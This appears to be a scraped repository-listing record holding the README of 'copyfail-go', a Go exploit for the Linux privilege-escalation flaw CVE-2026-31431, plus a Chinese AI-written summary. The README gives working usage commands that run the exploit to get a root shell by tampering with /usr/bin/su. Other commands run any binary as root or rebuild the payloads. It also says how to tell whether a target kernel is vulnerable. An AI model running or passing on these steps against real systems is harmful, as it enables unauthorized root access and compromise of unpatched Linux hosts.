[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-1160":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":9,"language":10,"languages":9,"totalLinesOfCode":9,"stars":11,"forks":12,"watchers":13,"openIssues":13,"contributorsCount":14,"subscribersCount":14,"size":14,"stars1d":14,"stars7d":13,"stars30d":15,"stars90d":14,"forks30d":14,"starsTrendScore":14,"compositeScore":16,"rankGlobal":9,"rankLanguage":9,"license":17,"archived":18,"fork":18,"defaultBranch":19,"hasWiki":20,"hasPages":18,"topics":21,"createdAt":9,"pushedAt":9,"updatedAt":22,"readmeContent":23,"aiSummary":24,"trendingCount":14,"starSnapshotCount":14,"syncStatus":25,"lastSyncTime":26,"discoverSource":27},1160,"copyfail-go","badsectorlabs\u002Fcopyfail-go","badsectorlabs","A Go implementation of copyfail (CVE-2026-31431)",null,"Assembly",353,76,1,0,8,5.66,"MIT License",false,"main",true,[],"2026-06-12 02:00:24","# CopyFail Go\n\n> Most Linux LPEs need a race window or a kernel-specific offset. Copy Fail is a straight-line logic flaw — it needs neither. The same ~~732-byte Python script~~ static Go binary roots every Linux distribution shipped since 2017.\n\nA Go implementation of CVE-2026-31431. In case you need a static binary and no Python dependency.\n\nSee [copy.fail](https:\u002F\u002Fcopy.fail) for more info.\n\n## Interactive shell\n\n```shell\n# Get the binary to your Linux host with code execution (exercise for the reader)\nuser@host$ chmod +x copyfail-go\nuser@host$ .\u002Fcopyfail-go --backup \u002Ftmp\u002Fsu\nroot@host# cat \u002Ftmp\u002Fsu > \u002Fusr\u002Fbin\u002Fsu # Restore the original su binary\nroot@host# touch -r \u002Ftmp\u002Fsu \u002Fusr\u002Fbin\u002Fsu # Restore the modified time of the original su\nroot@host# rm \u002Ftmp\u002Fsu\nroot@host# # Do things as root =)\n```\n\n## Run binary as root\n\nUseful to elevate a program to root\n\n```shell\n# Get the binary to your Linux host with code execution (exercise for the reader)\nuser@host$ chmod +x copyfail-go\nuser@host$ .\u002Fcopyfail-go --backup \u002Ftmp\u002Fsu --exec .\u002Fyour-binary\nuser@host$ # Use whatever you ran to restore su from \u002Ftmp\u002Fsu\n```\n\n## Don't trust those hex blobs?\n\nCompile the payloads yourself with `payloads\u002Fbuild-n-print.sh` on a Debian host (Debian 13 tested).\n\nYou'll need to `apt install nasm python3 binutils-aarch64-linux-gnu binutils-arm-linux-gnueabihf` then run the script from in the payloads directory. It will compile each payload and output the zlib compressed hex strings. Compare those to what is in `main.go` (or replace them with your own) and build the `copyfile-go` binaries with `goreleaser build --snapshot --clean` from the main project directory.\n\n## Affected kernels (from [copy-fail-c](https:\u002F\u002Fgithub.com\u002Ftgies\u002Fcopy-fail-c\u002Ftree\u002Fmain#affected-kernels))\n\n```\nfloor: torvalds\u002Flinux 72548b093ee3 August 2017, v4.14\n (AF_ALG iov_iter rework that\n introduced the file-page write\n primitive via splice into the AEAD\n scatterlist)\n\nceiling: torvalds\u002Flinux a664bf3d603d April 2026, mainline\n (reverts the 2017 algif_aead\n in-place optimization; separates\n source and destination scatterlists\n so page-cache pages can no longer\n be a writable crypto destination)\n```\n\nIn between: every major distro kernel that didn't backport the fix.\nUbuntu, RHEL, SUSE, Amazon Linux, and Debian were all confirmed vulnerable\nin their stock cloud-image kernels at disclosure time. Distro-level\nbackports started rolling out around 2026-04-29 alongside the public\ndisclosure. To verify whether a target kernel is in-window, check whether\n`a664bf3d603d` (or its distro-specific backport) is present in the kernel's\ngit log or the distro's changelog.\n","CopyFail Go 是一个利用 CVE-2026-31431 漏洞的 Go 语言实现,旨在提供一个静态二进制文件以提升 Linux 系统权限。该项目的核心功能在于通过逻辑漏洞而非竞态条件或内核特定偏移量来实现提权,适用于自2017年以来发布的大多数Linux发行版。技术上,它使用了Assembly语言编写的关键部分,并且无需依赖Python环境即可运行。该工具非常适合需要在目标Linux主机上执行代码并获取root权限的安全测试场景。用户可以通过编译项目中的payloads来自定义生成二进制文件,确保其安全性与可靠性。",2,"2026-06-11 02:41:59","CREATED_QUERY"]